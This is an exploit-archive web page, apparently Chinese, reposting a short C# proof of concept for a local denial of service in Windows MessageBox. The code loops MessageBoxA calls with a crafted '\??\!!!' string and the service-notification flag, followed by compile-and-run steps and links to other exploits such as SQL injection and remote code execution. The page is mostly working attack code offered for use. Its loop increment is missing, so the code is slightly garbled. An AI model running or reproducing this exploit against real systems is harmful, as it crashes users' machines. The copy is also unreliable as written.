手机
当前位置:查字典教程网 >网络安全 >Exploit >MS Windows (MessageBox) Memory Corruption Local Denial of Service
MS Windows (MessageBox) Memory Corruption Local Denial of Service
摘要://mbox.csusingSystem;usingSystem.Runtime.InteropServices;classHelloWor...

// mbox.cs

using System;

using System.Runtime.InteropServices;

class HelloWorldFromMicrosoft

{

[DllImport("user32.dll")]

unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType); static unsafe void Main()

{

byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};

uint MB_SERVICE_NOTIFICATION = 0x00200000u;

fixed(byte* pHelloBug = &helloBug[0])

{

for(int i=0; i<10; i )

MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);

}

}

}

// >> csc /unsafe mbox.cs

// >> mbox.exe//http://www.leftworld.net

【MS Windows (MessageBox) Memory Corruption Local Denial of Service】相关文章:

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

WS_FTP Home/Professional FTP Client Remote Format String PoC

MS Internet Explorer Recordset Double Free Memory Exploit

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

CodeDB (list.php lang) Local File Inclusion Vulnerability

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

精品推荐
分类导航